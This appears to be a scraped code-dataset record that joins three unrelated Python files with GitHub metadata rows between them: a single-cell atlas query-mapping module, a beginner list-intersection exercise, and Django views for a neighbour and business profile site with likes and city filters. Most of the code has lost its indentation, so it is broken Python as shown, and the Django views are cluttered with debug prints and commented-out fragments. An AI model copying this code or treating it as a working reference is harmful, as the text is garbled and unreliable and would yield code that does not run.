import logging
import warnings
from typing import List, Tuple
import numpy as np
import pandas as pd
from anndata import AnnData
from mudata import MuData
from pandas.api.types import is_numeric_dtype
from sklearn.neighbors import KNeighborsClassifier
from ..utils import check_transition_rule, get_views_from_structure
from .MultiViewAtlas import MultiViewAtlas, _harmonize_mdata_full
warnings.simplefilter(action="ignore", category=FutureWarning)
warnings.simplefilter(action="ignore", category=UserWarning)
# logger = logging.getLogger(__name__)
# logger.propagate = False
# ch = RichHandler(level=logging.INFO, show_path=False, show_time=False)
# formatter = logging.Formatter("%(message)s")
# ch.setFormatter(formatter)
# logger.addHandler(ch)
def load_query(
mvatlas: MultiViewAtlas,
adata_query: AnnData,
) -> MultiViewAtlas:
"""Load query data to full view of multi-view atlas
Params:
-------
mvatlas:
MultiViewAtlas object
adata_query:
AnnData of query data
Returns:
--------
MultiViewAtlas object with mapped query cells in full view
"""
# Define all current view - next view pairs for assignment
view_pairs = mvatlas.get_view_pairs()
# Check if query cells already in mdata
if adata_query.obs_names.isin(mvatlas.mdata.obs_names).all():
vdata_full = mvatlas.mdata["full"].copy()
else:
vdata_full = concatenate_query(mvatlas, adata_query, "full")
# Check that at least one mapping from full view is possible with transition rules
rules_from_full = view_pairs[view_pairs.depth == 0]["transition_rule"].unique()
missing_rules = []
for r in rules_from_full:
try:
if check_transition_rule(adata_query, r) is None:
continue
except ValueError:
missing_rules.append(r)
if len(rules_from_full) == len(missing_rules):
raise ValueError(
f"""
No mapping possible from full view. Please add info on rules {missing_rules} to query dataset
"""
)
mdata = mvatlas.mdata.copy()
mdata.mod["full"] = vdata_full.copy()
try:
mdata.update()
except KeyError:
mdata.update()
del mdata.obsm["view_assign"]
mvatlas_mapped = MultiViewAtlas(mdata, rename_obsm=False)
mvatlas_mapped.view_transition_rule = mvatlas.view_transition_rule.copy()
_harmonize_mdata_full(mvatlas_mapped)
return mvatlas_mapped
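# Usage sketch (names are illustrative: `mvatlas` is an existing MultiViewAtlas
# and `adata_query` an AnnData carrying the obs/obsm needed by the transition
# rules):
#
#   mvatlas_mapped = load_query(mvatlas, adata_query)
#   mvatlas_mapped = split_query(mvatlas_mapped)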
def split_query(
mvatlas_mapped: MultiViewAtlas,
) -> MultiViewAtlas:
"""Assign query data to views in atlas, based on transition rules.
Params:
-------
mvatlas:
MultiViewAtlas object
Returns:
--------
MultiViewAtlas object with mapped query cells
"""
# Define all current view - next view pairs for assignment
view_pairs = mvatlas_mapped.get_view_pairs()
# Check that load_query was run
try:
if sum(mvatlas_mapped.mdata["full"].obs["dataset_group"] == "query") == 0:
raise ValueError("No query cells in mdata - run load_query first")
except KeyError:
raise ValueError("No query cells in mdata - run load_query first")
vdata_full = mvatlas_mapped.mdata["full"].copy()
new_view_assign = pd.DataFrame()
vdata_dict = {}
vdata_dict["full"] = vdata_full.copy()
for _, row in view_pairs.iterrows():
depth = row["depth"]
current_view = row["parent_view"]
next_view = row["child_view"]
try:
n_query_current = sum(vdata_dict[current_view].obs["dataset_group"] == "query")
except KeyError:
n_query_current = 0
try:
n_query_next = sum(mvatlas_mapped.mdata[next_view].obs["dataset_group"] == "query")
except KeyError:
n_query_next = 0
# if "dataset_group" in vdata_dict[current_view].obs:
if n_query_current > 0:
adata_query = vdata_dict[current_view][vdata_dict[current_view].obs["dataset_group"] == "query"].copy()
logging.info(f"Assigning to {next_view} from {current_view} with rule {row['transition_rule']}")
# print(adata_query)
# print(vdata_dict[current_view])
# print(mvatlas_mapped.mdata[current_view])
if n_query_next > 0:
logging.info(f"Query cells already in {next_view}")
v_assign = mvatlas_mapped.mdata.obsm["view_assign"][[next_view]]
vdata_dict[next_view] = mvatlas_mapped.mdata[next_view].copy()
else:
adata_query_concat = AnnData(obs=adata_query.obs, obsm=adata_query.obsm, obsp=adata_query.obsp)
if depth > 0:
adata_query_concat = adata_query_concat[
new_view_assign.loc[adata_query_concat.obs_names, current_view] == 1
].copy()
v_assign, next_view_adata = map_next_view(
mvatlas_mapped, adata_query_concat, current_view=current_view, next_view=next_view
)
vdata_dict[next_view] = next_view_adata.copy()
else:
logging.info(f"No query cells in {current_view}")
v_assign = mvatlas_mapped.mdata.obsm["view_assign"][[next_view]]
vdata_dict[next_view] = mvatlas_mapped.mdata[next_view].copy()
        new_view_assign = pd.concat([new_view_assign, v_assign], axis=1)
new_view_assign = new_view_assign.fillna(0)
vdata_full.obsm["view_assign"] = new_view_assign.copy()
vdata_full.uns["view_hierarchy"] = mvatlas_mapped.view_hierarchy
vdata_dict["full"] = vdata_full
mdata = MuData({v: vdata_dict[v] for v in get_views_from_structure(mvatlas_mapped.view_hierarchy)})
mdata.mod["full"] = mdata.mod["full"][mdata.obs_names].copy()
view_transition_rule = mvatlas_mapped.view_transition_rule.copy()
# trans_rule = pd.Series(mvatlas.view_transition_rule.values.ravel()).dropna().unique()[0]
mvatlas_mapped = MultiViewAtlas(mdata, rename_obsm=False, transition_rule=view_transition_rule)
# mvatlas_mapped.view_transition_rule = view_transition_rule.copy()
return mvatlas_mapped
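# Hedged sketch of the intended two-step workflow (inferred from the checks above, not a
# verbatim example from the package docs): query cells are first concatenated into the
# full view, then propagated down the view hierarchy by the transition rules.
#
#     mvatlas_mapped = load_query(mvatlas, adata_query)   # adds query cells to "full"
#     mvatlas_split = split_query(mvatlas_mapped)         # assigns them to child views
#     mvatlas_split.mdata.obsm["view_assign"]             # per-cell view membership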
def concatenate_query(
mvatlas: MultiViewAtlas,
adata_query: AnnData,
view: str,
batch_key: str = "dataset_group",
batch_categories: List[str] = None,
):
"""Concatenate query data to atlas data"""
if batch_categories is None:
batch_categories = ["atlas", "query"]
adata_atlas = mvatlas.mdata[view].copy()
assert np.intersect1d(adata_atlas.obs_names, adata_query.obs_names).size == 0
adata_atlas = adata_atlas.concatenate(
adata_query, batch_key=batch_key, batch_categories=batch_categories, index_unique=None, uns_merge="unique"
)
return adata_atlas
def assign_from_similarity(Y_assign_atlas, X_similarity_atlas, X_similarity_query, v_assign, k=10):
"""Assign query cells to atlas views based on similarity to atlas cells.
Similarity can be derived from metadata annotation or from latent space
"""
if not isinstance(v_assign, pd.DataFrame):
raise ValueError("v_assign must be a pandas DataFrame")
if not v_assign.shape[1] == 1:
raise ValueError("v_assign must have only one column")
clf = KNeighborsClassifier(n_neighbors=k, metric="euclidean").fit(X_similarity_atlas, Y_assign_atlas)
Y_assign_query = clf.predict(X_similarity_query)
assign_predict = pd.DataFrame(Y_assign_query, columns=v_assign.columns)
return assign_predict
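# Hedged toy example for assign_from_similarity (illustrative values only): atlas cells
# with a 1-D similarity feature and a binary view assignment, plus two query cells
# classified with k=1 neighbours.
#
#     X_atlas = np.array([[0.0], [0.1], [5.0], [5.1]])
#     y_atlas = np.array([0, 0, 1, 1])
#     v_assign = pd.DataFrame({"next_view": [0, 0, 1, 1]})
#     X_query = np.array([[0.05], [5.05]])
#     assign_from_similarity(y_atlas, X_atlas, X_query, v_assign, k=1)
#     # -> DataFrame with column "next_view" and predictions [0, 1]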
def map_next_view(
mvatlas: MultiViewAtlas,
adata_query: AnnData,
current_view: str,
next_view: str,
batch_key: str = "dataset_group",
batch_categories: List[str] = None,
) -> Tuple[pd.DataFrame, AnnData]:
"""Assign query cells to next view based on similarity to atlas cells.
Similarity is defined by the transition rule.
"""
if batch_categories is None:
batch_categories = ["atlas", "query"]
# curr_view_adata = _concatenate_query(mvatlas, adata_query, current_view, batch_key=batch_key, batch_categories=batch_categories)
curr_view_adata = mvatlas.mdata[current_view].copy()
next_view_adata = mvatlas.mdata[next_view].copy()
# Get similarity from transition rule
if batch_key in curr_view_adata.obs.columns:
v_assign = mvatlas.mdata.obsm["view_assign"].loc[mvatlas.mdata["full"].obs[batch_key] == batch_categories[0]][
[next_view]
]
curr_view_adata = curr_view_adata[curr_view_adata.obs[batch_key] == batch_categories[0]].copy()
# next_view_adata = next_view_adata[next_view_adata.obs[batch_key] == batch_categories[0]].copy()
# assert "dataset_group" not in next_view_adata.obs.columns
else:
v_assign = mvatlas.mdata.obsm["view_assign"].loc[mvatlas.mdata["full"].obs[batch_key] == batch_categories[0]][
[next_view]
]
transition_rule = mvatlas.view_transition_rule[current_view][next_view]
if transition_rule is not None:
try:
check_transition_rule(adata_query, transition_rule)
except ValueError:
logging.warning(
f"Could not check transition rule {transition_rule} for query data - skipping mapping from {current_view} to {next_view}"
)
v_assign_query = pd.DataFrame(0, columns=[next_view], index=adata_query.obs_names)
v_assign = pd.concat([v_assign, v_assign_query], axis=0)
return v_assign, next_view_adata
# Split to next view based on transition rule
# if transition is in obs
if transition_rule in adata_query.obs.columns:
if is_numeric_dtype(adata_query.obs[transition_rule]):
X_similarity_atlas = curr_view_adata.obs[[transition_rule]].values
X_similarity_query = adata_query.obs[[transition_rule]].values
else:
X_similarity_atlas = pd.get_dummies(curr_view_adata.obs[transition_rule])
X_similarity_query = pd.get_dummies(adata_query.obs[transition_rule])
# Check for missing levels
missing_cols = [x for x in X_similarity_atlas.columns if x not in X_similarity_query.columns]
if len(missing_cols) > 0:
X_similarity_query[missing_cols] = 0
X_similarity_query = X_similarity_query[X_similarity_atlas.columns].copy()
X_similarity_atlas = X_similarity_atlas.values
X_similarity_query = X_similarity_query.values
if transition_rule in adata_query.obsm:
X_similarity_atlas = curr_view_adata.obsm[transition_rule]
X_similarity_query = adata_query.obsm[transition_rule]
# X_similarity = curr_view_adata.obsm[transition_rule]
else:
raise ValueError(f"No transition rule defined for {current_view} -> {next_view}")
# Get assignment to next view
Y_assign_atlas = v_assign.loc[curr_view_adata.obs_names].values.ravel()
v_assign_query = assign_from_similarity(Y_assign_atlas, X_similarity_atlas, X_similarity_query, v_assign)
v_assign_query.index = adata_query.obs_names
v_assign = pd.concat([v_assign, v_assign_query], axis=0)
next_view_adata = concatenate_query(
mvatlas,
adata_query[v_assign_query[next_view] == 1],
next_view,
batch_key=batch_key,
batch_categories=batch_categories,
)
return v_assign, next_view_adata
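# Hedged note (not in the original file): map_next_view is the internal helper used by
# split_query. It returns (v_assign, next_view_adata), where v_assign is a one-column
# DataFrame marking membership in `next_view` for atlas and query cells, and
# next_view_adata is that view with the newly assigned query cells concatenated in.
# Example call, reusing the assumed objects from the sketches above ("some_child_view"
# is a placeholder view name):
#
#     v_assign, next_view_adata = map_next_view(
#         mvatlas_mapped, adata_query_concat, current_view="full", next_view="some_child_view"
#     )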
|
Teichlab/multi-view-atlas
|
src/multi_view_atlas/tl/map_query.py
|
map_query.py
|
py
| 11,557 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8633193297
|
'''
Exercise 5
Take two lists, say for example these two:
a = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]
b = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]
and write a program that returns a list that contains only the elements that are common between the lists (without duplicates). Make sure your program works on two lists of different sizes.
Extras:
1. Randomly generate two lists to test this
2. Write this in one line of Python (don’t worry if you can’t figure this out at this point - we’ll get to it soon)
'''
# Use a hash lookup table to bring the complexity down to O(n+m)
from random import randint
def main():
list_1 = [randint(0,20) for r in range(randint(10,20))]
list_2 = [randint(0,20) for r in range(randint(10,20))]
result = []
D = {}
for num in list_1:
if num not in D:
D[num] = ''
for num in list_2:
if (num in D) and (D[num] == ''):
result.append(num)
D[num] = ' '
    list_1.sort()  # sort to make manual checking easier (O(n log n))
list_2.sort()
result.sort()
print('List 1: {}'.format(list_1))
print('List 2: {}'.format(list_2))
print('Result: {}'.format(result))
if __name__ == "__main__":
main()
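# Hedged sketch for Extra #2 (the one-line version, not part of the original file): the
# duplicate-free intersection can be written with set operations, e.g.
#
#     result = sorted(set(list_1) & set(list_2))
#
# Set membership checks are O(1) on average, so this matches the dict-based O(n + m) approach.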
|
kaichunchou/Python-Review
|
Exercise_5/Exercise_5.py
|
Exercise_5.py
|
py
| 1,255 |
python
|
en
|
code
| 0 |
github-code
|
6
|
19624665111
|
# -*- coding: utf-8 -*-
import math
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import HttpResponse, JsonResponse
from django.shortcuts import render, redirect
from django.contrib import messages
# Create your views here.
from django.urls import reverse_lazy
from create_profile.forms import CreateFormsB
from create_profile.models import CreateNeighbour, CreateBusiness, LikeModel, LikeBusinesModel, AllCities#, \
#Profession # , LikeEndModelNe
def index(request):
    # Home page
if request.user.is_authenticated:
        # on login, show a message to users who have mutual neighbour likes
all_likes = LikeModel.objects.filter(like_second=request.user).values('like_first')
for all_likes_s in all_likes:
# print('all_likes-Neighb')
# print(all_likes)
step_one = []
step_two = []
if len(all_likes) > 0:
                # print('step 1 found')
step_one = all_likes_s
            # step 2
all_likes_two = LikeModel.objects.filter(like_first=request.user).values('like_second')
if len(all_likes_two) > 0:
                # print('step 2 found')
# print(all_likes_two)
step_two = all_likes_two
# ii = int(0)
# print('step_one :', step_one)
# print('step_two :', step_two)
for step_two_s in step_two:
if step_two_s['like_second'] == step_one['like_first']:
messages.success(request, 'Вас лайкнул пользователь: ' + step_two_s['like_second'])
email_second = LikeModel.objects.filter(like_second=step_two_s['like_second']).values('email_second')
messages.success(request, ' Напишите ему: ' + email_second[0]['email_second'])
all_likes_b = LikeBusinesModel.objects.filter(like_second=request.user).values()
for all_likes_s_b in all_likes_b:
step_one_b = []
step_two_b = []
if len(all_likes_b) > 0:
if len(all_likes_b) > 0:
step_one_b = all_likes_s_b
all_likes_b_two = LikeBusinesModel.objects.filter(like_first=request.user).values('like_second')
if len(all_likes_b_two) > 0:
step_two_b = all_likes_b_two
for all_likes_s_b_s in step_two_b:
if all_likes_s_b_s['like_second'] == step_one_b['like_first']:
messages.success(request, 'Вас лайкнул бизнес пользователь: ' + all_likes_s_b_s['like_second'])
email_second_b = LikeBusinesModel.objects.filter(like_second=all_likes_s_b_s['like_second']).values('email_second')
messages.success(request, 'Почта для связи: ' + email_second_b[0]['email_second'])
return render(request, 'index.html',)
else:
return render(request, 'index.html', )
@login_required(login_url=reverse_lazy('login'))
def all_filter_search(request):
    # show all neighbour profiles
list_tmp_13 = 0
allCities = AllCities.objects.all()
catalog_filter = CreateNeighbour.objects.values_list('id',
'name',
'gender',
'gender_neighb',
# 'sel_city',
# 'sel_distr',
'presence_animals',
'presence_flat',
'attitude_animals',
'attitude_smok',
'about_me',
'image',
'user_neig',
'cities',
'regin',)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
    # build the array for rendering in the template
for all_goods_s in catalog_filter:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
p = CreateNeighbour(gender=tmp_s[2])
gender = p.get_gender_display()
p = CreateNeighbour(gender_neighb=tmp_s[3])
gender_neighb = p.get_gender_neighb_display()
# p = CreateNeighbour(sel_city=tmp_s[4])
# sel_city = p.get_sel_city_display()
#
# p = CreateNeighbour(sel_distr=tmp_s[5])
# sel_distr = p.get_sel_distr_display()
p = CreateNeighbour(attitude_animals=tmp_s[6])
attitude_animals = p.get_attitude_animals_display()
p = CreateNeighbour(attitude_smok=tmp_s[7])
attitude_smok = p.get_attitude_smok_display()
cities_name = AllCities.objects.filter(name=tmp_s[11]).values('name')
distr_name = AllCities.objects.filter(name=tmp_s[12]).values('name')
# cities_b = p.get_cities_b_display()
# print('allCities_name')
#
# print(cities_name[0]['name'])
# print(distr_name[0]['name'])
list_tmp = list(tmp_s)
list_tmp[2] = gender
list_tmp[3] = gender_neighb
# list_tmp[4] = sel_city
# list_tmp[5] = sel_distr
list_tmp[6] = attitude_animals
list_tmp[7] = attitude_smok
list_tmp[11] = cities_name[0]['name']
list_tmp[12] = distr_name[0]['name']
        user_like = LikeModel.objects.filter(first_id=tmp_s[10]).filter(second_id=request.user.id).values_list('id')  # likes shown in the template
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
        tmp_categ_name.append(tmp_categ_name_list)  # build the array with all profiles
# print('allCities')
# print(allCities)
return render(request, 'all_neighb.html', {'serxh_filer': tmp_categ_name, 'allCities': allCities,})
@login_required(login_url=reverse_lazy('login'))
def all_busines(request):
    # all business profiles
    # build the array with all profiles
distinr = CreateBusiness.objects.order_by('category_bus').values('category_bus').distinct()
print('distin254')
print(distinr)
allCities = AllCities.objects.all()
form = CreateFormsB()
search_filer = CreateBusiness.objects.values_list('name_bus',
# 'sel_city',
# 'sel_distr',
'category_bus',
'about_me',
'image',
'user_bus',
'id',
'cities',
'regin',)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
for all_goods_s in search_filer:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
# p = CreateBusiness(sel_city=tmp_s[1])
# sel_city = p.get_sel_city_display()
#
# p = CreateBusiness(sel_distr=tmp_s[2])
# sel_distr = p.get_sel_distr_display()
# cities_name_b = AllCities.objects.filter(id=tmp_s[8]).values('name')
# distr_name_b = AllCities.objects.filter(id=tmp_s[9]).values('name')
# search_filer_pro = Profession.objects.filter(id=tmp_s[10]).values('name')
# cities_b = p.get_cities_b_display()
# print('search_filer_pro')
# print(search_filer_pro[0]['name'])
list_tmp = list(tmp_s)
# list_tmp[1] = sel_city
# list_tmp[2] = sel_distr
# list_tmp[8] = cities_name_b[0]['name']
# list_tmp[9] = distr_name_b[0]['name']
# list_tmp[10] = search_filer_pro[0]['name']
# list_tmp[11] = search_filer_pro[0]['name']
        # likes
user_like = LikeBusinesModel.objects.filter(first_id=tmp_s[4]).filter(second_id=request.user.id).values_list('id')
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
# AllCities.cities_b.all()
        tmp_categ_name.append(tmp_categ_name_list)  # build the array with all profiles
return render(request, 'all_busines.html', {'serxh_filer': tmp_categ_name, 'allCities': allCities, 'form': form, 'distinr': distinr})
def likes(request):
    # likes: store the liking user and the profile owner in the table
test_user = User.objects.filter(id=request.POST.get('first')).values('username', 'email')
nearly_final = LikeModel(like_first=test_user[0]['username'], email_first=test_user[0]['email'],
like_second=request.POST.get('second'), email_second=request.POST.get('email'),
first_id=request.POST.get('first'), second_id=request.POST.get('second_id'),
id_ancket=request.POST.get('id_ancket'),)
nearly_final.save(force_insert=True)
return redirect('/all_neighb/')
def likes_busines(request):
    # likes: store the liking user and the profile owner in the table
test_user = User.objects.filter(id=request.POST.get('first')).values('username', 'email')
nearly_final = LikeBusinesModel(like_first=test_user[0]['username'], email_first=test_user[0]['email'],
like_second=request.POST.get('second'), email_second=request.POST.get('email'),
first_id=request.POST.get('first'), second_id=request.POST.get('second_id'),
id_ancket=request.POST.get('id_ancket'),)
nearly_final.save(force_insert=True)
return redirect('/all_busines/')
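# Hedged note (not in the original file): both like views above expect a POST payload
# with the keys read via request.POST.get, roughly
#
#     {"first": <liking user id>, "second": <profile owner username>,
#      "email": <profile owner email>, "second_id": <profile owner id>,
#      "id_ancket": <profile id>}
#
# The field meanings are inferred from how the values are stored in LikeModel /
# LikeBusinesModel and may differ from what the actual templates send.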
def statistics(request):
    # statistics
count_us = User.objects.values('username', 'email')
count_users = (len(count_us))
all_likes = LikeModel.objects.values()
count_stat = len(all_likes)/2
all_likes_n = math.ceil(count_stat)
all_likes_b = LikeBusinesModel.objects.values()
count_stat = len(all_likes_b)/2
all_likes_bus = math.ceil(count_stat)
# for count_us_s in count_us:
print(count_us[0]['username'])
tmp =count_us[0]['username']
all_likes_count = LikeModel.objects.filter(like_second=count_us[0]['username']).count()
all_likes_count_two = LikeModel.objects.filter(like_first=count_us[0]['username']).count()
if all_likes_count > 0 and all_likes_count_two > 0:
# print('tmp')
# print(tmp)
all_likes_count_two_two = LikeModel.objects.filter(like_first=count_us[0]['username']).values()
# print('all_likes_count_two_two ')
# print(all_likes_count_two_two[0]['like_first'])
# save_end_like = LikeEndModelNe(like_first=all_likes_count_two_two[0]['like_first'],
# email_first=all_likes_count_two_two[0]['email_first'],
# like_second=all_likes_count_two_two[0]['like_second'],
# email_second=all_likes_count_two_two[0]['email_second'],)
# print('save_end_like')
# print(save_end_like)
# save_end_like.save()
# print(all_likes_count, all_likes_count_two)
return render(request, 'statistics.html', {'count_users':count_users, 'all_likes_n': all_likes_n, 'all_likes_bus': all_likes_bus})
def tree_form(request):
    # get the districts for a given city id
dict1 = {}
# print(request.GET.get('id'))
city_id = request.GET.get('id')
all_child = AllCities.objects.filter(parent_id=city_id).values('name', 'id')
# print('all_child')
# print(all_child)
    dict1['data'] = list(all_child)  # wrap the list in a dict so it can be returned as JSON
# print('dict1')
# print(dict1)
return JsonResponse(dict1)
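# Hedged example (not in the original file) of the JSON shape returned by tree_form
# (and tree_form_b below), based on the values('name', 'id') queryset; the district
# names and ids here are purely illustrative:
#
#     request GET params: id=<city id>
#     response: {"data": [{"name": "Central district", "id": 12},
#                         {"name": "North district", "id": 13}]}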
def tree_form_b(request):
dict2 = {}
print(request.GET.get('id'))
city_id = request.GET.get('id')
all_child = AllCities.objects.filter(parent_id=city_id).values('name', 'id')
print('all_child_b-450')
print(all_child)
# return HttpResponse('1')
dict2['data']=list(all_child)
print('dict1_b-456')
print(dict2)
# return JsonResponse({'all_child': all_child, 'status': 'ok', 'dict1': dict1})
return JsonResponse(dict2)
# return HttpResponse({'all_child': all_child,})
def search_fetch(request):
    # get profiles by city id, district and neighbour gender
print('distr-461')
print(request.GET.get('id'))
print('seacrprof464')
print(request.GET.get('distr'))
print(request.GET)
cities_name = AllCities.objects.filter(id=request.GET.get('id')).values('name')
distr_name = AllCities.objects.filter(id=request.GET.get('distr')).values('name')
catalog_filter=CreateNeighbour.objects.filter(cities=cities_name[0]['name'],
regin=distr_name[0]['name'],
gender=request.GET.get('ender')).\
values_list('id',
'name',
'gender',
'gender_neighb',
# 'sel_city',
# 'sel_distr',
'presence_animals',
'presence_flat',
'attitude_animals',
'attitude_smok',
'about_me',
'image',
'user_neig',
'cities',
'regin',)
print('catalog_filter')
print(catalog_filter)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
    # build the array for rendering in the template
for all_goods_s in catalog_filter:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
p = CreateNeighbour(gender=tmp_s[2])
gender = p.get_gender_display()
p = CreateNeighbour(gender_neighb=tmp_s[3])
gender_neighb = p.get_gender_neighb_display()
# p = CreateNeighbour(sel_city=tmp_s[4])
# sel_city = p.get_sel_city_display()
#
# p = CreateNeighbour(sel_distr=tmp_s[5])
# sel_distr = p.get_sel_distr_display()
        # attitude fields sit at indices 6 and 7 of the values_list, as in all_filter_search
        p = CreateNeighbour(attitude_animals=tmp_s[6])
        attitude_animals = p.get_attitude_animals_display()
        p = CreateNeighbour(attitude_smok=tmp_s[7])
        attitude_smok = p.get_attitude_smok_display()
# cities_name = AllCities.objects.filter(id=tmp_s[11]).values('name')
# distr_name = AllCities.objects.filter(id=tmp_s[12]).values('name')
list_tmp = list(tmp_s)
list_tmp[2] = gender
list_tmp[3] = gender_neighb
# list_tmp[4] = sel_city
# list_tmp[5] = sel_distr
        list_tmp[6] = attitude_animals
        list_tmp[7] = attitude_smok
list_tmp[11] = cities_name[0]['name']
list_tmp[12] = distr_name[0]['name']
        user_like = LikeModel.objects.filter(first_id=tmp_s[10]).filter(second_id=request.user.id).values_list('id')  # likes shown in the template
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
        tmp_categ_name.append(tmp_categ_name_list)  # build the array with all profiles
print('allCities')
print(tmp_categ_name)
return render(request, 'filtr_neig.html', {'filter_ne':tmp_categ_name})
# return JsonResponse(dict1)
def search_fetch_b(request):
# dict1 = {}
# filter_ne= CreateNeighbour.objects.filter(cities_id=request.GET.get('id')).values()
# print('filter_ne')
# print(filter_ne)
print('distr-513')
print(request.GET.get('id'))
print('seacrprof546')
print(request.GET.get('distr'))
print('seacrprof-548')
print(request.GET.get('prof'))
# dict1['data']=list(filter_ne)
allCities = AllCities.objects.all()
# catalog_filter = CreateNeighbour.objects. \
# catalog_filter=CreateNeighbour.objects.filter(cities_id=request.GET.get('id'),districts_tree=request.GET.get('distr'),gender=request.GET.get('ender')). \, category_bus=request.GET.get('prof'))\
cities_name = AllCities.objects.filter(id=request.GET.get('id')).values('name')
distr_name = AllCities.objects.filter(id=request.GET.get('distr')).values('name')
search_filer = CreateBusiness.objects.filter(cities=cities_name[0]['name'],
regin=distr_name[0]['name'],
category_bus=request.GET.get('prof')).values_list('name_bus',
# 'sel_city',
# 'sel_distr',
'category_bus',
'about_me',
'image',
'user_bus',
'id',
'cities',
'regin',)
print('search_filer-561')
print(search_filer)
tmp_append_goods = []
tmp_categ_name = []
tmp_categ_name_list = []
for all_goods_s in search_filer:
tmp_append_goods.append(all_goods_s)
for tmp_s in tmp_append_goods:
# p = CreateBusiness(sel_city=tmp_s[1])
# sel_city = p.get_sel_city_display()
#
# p = CreateBusiness(sel_distr=tmp_s[2])
# sel_distr = p.get_sel_distr_display()
list_tmp = list(tmp_s)
# list_tmp[1] = sel_city
# list_tmp[2] = sel_distr
user_like = LikeBusinesModel.objects.filter(first_id=tmp_s[4]).filter(second_id=request.user.id).values_list('id')
flag = 0
if len(user_like) > 0:
flag = '1'
else:
flag = '0'
list_tmp.append(flag)
list_tmp = tuple(list_tmp)
for list_tmp_s in [list_tmp]:
tmp_categ_name_list = list_tmp_s
        tmp_categ_name.append(tmp_categ_name_list)  # build the array with all profiles
print('tmp_categ_name-598')
print(tmp_categ_name)
return render(request, 'test_busines.html', {'serxh_filer': tmp_categ_name})
# return JsonResponse(dict1)
|
drhtka/prifile
|
main/views.py
|
views.py
|
py
| 21,683 |
python
|
en
|
code
| 0 |
github-code
|
6
|